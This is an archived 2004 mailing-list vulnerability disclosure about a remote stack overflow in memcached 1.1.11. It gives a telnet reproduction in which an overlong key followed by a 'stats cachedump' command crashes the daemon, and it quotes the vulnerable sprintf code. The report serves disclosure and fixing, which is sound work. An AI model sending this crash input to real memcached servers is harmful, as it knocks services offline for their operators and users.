remote stack overflow in memcached-1.1.11

Thu, 22 Jul 2004 16:44:04 +0400

--=-9M6rrCFrUe+wyGP360X+
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Hello,

Just found generic stack overflow in memcached, it's easy reproducable:

> telnet localhost 11211
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
add
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq=
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq=
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq=
qqqqqqqqqqqqqqqqqqqqqqqqq 0 0 0
STORED
stats cachedump 9 100000
Connection closed by foreign host.

memcached daemon dies with segmentation fault message.

The bug lays here:

char *item_cachedump(unsigned int slabs_clsid, unsigned int limit,
unsigned int *bytes) {
...
    char temp[256];
...
        sprintf(temp, "ITEM %s [%u b; %lu s]\r\n", ITEM_key(it),
it->nbytes - 2, it->time);

While maximum key length is 250 bytes it is possible to overflow stack
variable temp and may be even execute arbitrary code (not checked at
this moment)

--=20
Andrei Nigmatulin
GPG PUB KEY 6449830D

--=-9M6rrCFrUe+wyGP360X+
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: =?koi8-r?Q?=FC=D4=C1?= =?koi8-r?Q?_=DE=C1=D3=D4=D8?=
	=?koi8-r?Q?_=D3=CF=CF=C2=DD=C5=CE=C9=D1?=
	=?koi8-r?Q?_=D0=CF=C4=D0=C9=D3=C1=CE=C1?=
	=?koi8-r?Q?_=C3=C9=C6=D2=CF=D7=CF=CA?=
	=?koi8-r?Q?_=D0=CF=C4=D0=C9=D3=D8=C0?=

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQBA/7aUtpDBPmRJgw0RAvl8AJ94H0cGPyav5wtxtxGl/L1FQoB74QCfZUFf
MXyyJSlLqQT5geI8NCySir4=
=DcX0
-----END PGP SIGNATURE-----

--=-9M6rrCFrUe+wyGP360X+--